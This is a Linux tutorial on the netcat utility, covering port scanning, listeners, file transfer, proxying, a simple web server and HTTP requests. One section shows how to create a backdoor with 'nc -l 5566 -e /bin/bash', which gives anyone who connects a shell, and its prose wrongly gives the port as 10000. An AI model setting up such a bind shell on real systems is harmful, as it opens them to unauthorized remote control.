This comprehensive Linux guide expects that you run the following commands as root user but if you decide to run the commands as a different user then ensure that the user has sudo access and that you precede each of the privileged commands with sudo

netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.

It works similarly to the cat command but it is for the network. It reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to the linux users as it is called the Swiss Army Knife of networking tools. It is most oftenly used by networking specialists to monitor, test and send data across a network.

In this tutorial, we will show you the use of the netcat command with multiple examples.

Installing netcat Command

To install netcat command on your linux machine, you can run the following command

On Debian Based Systems

root@codesposts:~$ apt install netcat

On Red-Hat Based Systems Or CentOS

root@codesposts:~$ yum install nmap-ncat

General Syntax

Following is the general syntax of the netcat

root@codesposts:~$ netcat [options] host port
OR
root@codesposts:~$ ncat [options] host port
OR
root@codesposts:~$ nc [options] host port

Using netcat For Port Scanning

netcat is most commenly used for port scanning. You can scan a single port as well as multiple ports or a range of ports. You can use the option -z for only scanning the open ports without sending any data and option -v to get a more detailed output.

root@codesposts:~$ nc -z -v 155.138.206.18 80

Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) open

If you want to display only the open ports, you can filter the output through the grep command like this

root@codesposts:~$ nc -z -v 155.138.206.18 80-300 | grep succeeded 

Listening To Inbound Connections

You can also use this command to listen to inbound connections to your systems by using the option -l with a specific port to listen from.

root@codespsots:~$ nc -l port

root@codesposts:~$ nc -l 8080

Connecting To A System Remotely

You can connect to another system remotely using this command. You can run the command like below

root@codesposts:~$ nc IP_Address Port

root@codesposts:~$ nc 192.168.1.1 80

Checking Server Software And It’s Version

You can also use netcat command to find the server software and it’s version by sending the “EXIT” command to the server on the default SSH port 22 like below:

root@codesposts:~$ echo "EXIT" | nc 155.138.206.18 22

SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.

Chatting With A Remote System

You can also use netcat command to make a chat system between one host and another. First, you need to set up a host to listen through a specific port. Then you need to connect to that host using that port on your system.

From Server side

root@codesposts:~$ nc -l 4444

From Client Side

root@codesposts:~$ nc server-IP 4444

Replace the “host-IP” with the IP of the host that is listening for an inbound connection.

Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.

Sending/Receiving Files

You can also use netcat command to send or receive files from one host to another. For this, you first need to start the listener on the system on which the file is to be received.

root@codesposts:~$ nc -l 4444 > file.txt

Now, you can send the file from the other host using this port by running the command like this

root@codesposts:~$ nc host-IP 4444 < file.txt

Replace the “host-IP” with the IP of the host that is listening for the file to be received.

Sending/Receiving Directory

If you want to send a directory using netcat command, you first need to make an archive of that directory using tar command and then send it over using the netcat command.

root@codesposts:~$ tar czvf - /path/to/directory | nc host-IP 4444

Then you can receive the file and extract it using the command like this

root@codesposts:~$ nc -l 4444 | tar xzvf -

Using netcat As Proxy

You can also use netcat command as a proxy for your system.

root@codesposts:~$ nc -l 4444 | nc 192.168.100.1 40

Now all the connections coming to our server on port 4444 will be automatically redirected to 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so:

root@codesposts:~$ mkfifo 2way
root@codesposts:~$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way

After this command, you will be able to send a receive data over proxy.

Using UDP Ports

If you want to scan UDP ports, you can just add the option -u with the command

root@codesposts:~$ nc -u -z -v 192.168.100.1 80-200

192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) open

Similarly, you can add this option to any netcat command to implement it on the UDP ports.

Creating A Backdoor Using netcat Command

You can also use netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:

root@codesposts:~$ nc -l 5566 -e /bin/bash

-e flag attaches a bash to port 10000. Now a client can connect to port 10000 on server & will have complete access to our system via bash by running the command like this:

root@codesposts:~$ nc 192.168.100.1 5566

Running A Web Server With A Static Page Using netcat

You can also start a web server using the netcat command on a local host that will open a static web page “sample.html”. To perform this, you can run the command like this

First, make a new file with the name “sample.html” and copy the following code into the file.

<html>
        <head>
                <title>Test Page</title>
        </head>
        <body>
                <h1>Level 1 header</h1>
                <h2>Subheading</h2>
                <p>Normal text here</p>
        </body>
</html>

Then run the following command:

root@codesposts:~$ while true; do sudo nc -lp 80 < sample.html; done

After this, you can access the page on by going to “http://server-IP.com/sample.html”

Setting The Connection Timeout

If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command.

root@codesposts:~$ nc -w 10 192.168.100.1 4444

Making The Server Persistent

The server will terminate automatically when the client disconnects from it. To make the server to listen to more connections even when a client disconnects, you can use the option -k with the netcat command.

root@codesposts:~$ nc -l -k 4444

Performing HTTP Request

You can also use this command to send various HTTP requests to a remote server.

For example, if you want to retrieve the netcat main page from the OpenBSD web site, run this command:

root@codesposts:~$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80